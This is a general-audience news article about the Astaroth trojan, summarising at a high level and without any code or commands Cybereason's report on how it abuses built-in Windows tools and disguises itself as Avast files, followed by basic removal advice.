New Astaroth Virus Uses Anti-Malware Software to Steal User Information

An Astaroth virus, a strain of a Trojan virus was discovered to be targeting Brazillian and European countries, gaining access to devices by using legitimate applications and even anti-malware software to forgo firewalls. Software security company, Cybereason, found the strain and released a post on their blog about how Astaroth functions

The virus is spread mostly through email attachments and hyperlinks, uploading malicious modules to the device to monitor the user and send information back to the hackers. Among a few things that these modules do, it includes logging keystrokes, intercepting operating system calls, gathering information saved to the clipboard continuously, as well as collecting all user password information for various accounts.

Cybereason claims that this kind of virus can be fatal for organizations that cannot see into their digital environment. They claim that

“[b]ecause of the great potential for malicious exploitation inherent in the use of native processes, it is very likely that many other information stealers will adopt this method to deliver their payload into targeted machines.”

Astaroth is a strain of the Trojan virus that was initially discovered in 2017 and is incredibly intuitive, using the systems built in processes to bypass firewall and software protections. Upon downloading the link from either email or hyperlink, a .7zip file is uploaded to the device, using Windows BITSAdmin to download the payload. This payload includes a .lnk file, which spawns a wmic.exe file. From here, the virus will initialize an XSL Script processing attack. By using the native applications, the virus can hide the full scope of the damage done.

After connecting to a C2 server, information begins being sent to the hacker while simultaneously downloading applications that will help further the virus. To bypass anti-malware giant, Avast, the Astaroth virus injects an aswrundll.exe file on the device. This file is disguised as Avast’s Software Runtime Dynamic Link Library, which is how it avoids Avast’s scans. The virus is also designed to exploit the uninsooo.exe process of security, should Avast Anti-Virus not be downloaded on the infected device.

While you can follow the standard steps used to avoid scams and viruses, it’s difficult to combat something that bypasses what is one of the most common anti-virus software in the world. If a user believes that there could be something infecting their device, it’s best to delve into your list of running processes to see if something you don’t recognize could be running. Keep all your personal information on a computer under a password or 2-key authentication system to help further protect your delicate information.

There are a few ways to rid yourself of the Astaroth virus if you are one of the unlucky ones to have found yourself with the digital parasite. Because the program has no graphical user interface (GUI), there is no way to uninstall it directly from the device. Users would need an anti-malware program — Spyhunter, Reimage, or Malwarebytes are great options — to scan for the files and remove them. If users can’t download these programs directly to their devices, a USB stick can be used by downloading the program from an uninfected PC and downloading it to the infected device.

While the Astaroth virus has been contained to Brazil and Europe, the efficiency and speed which this virus has developed are more than enough to prove its viability. It may become more prominent in the time to come, as hackers develop more creative ways to manipulate and infect legitimate software to infect computers and crash unsuspecting systems.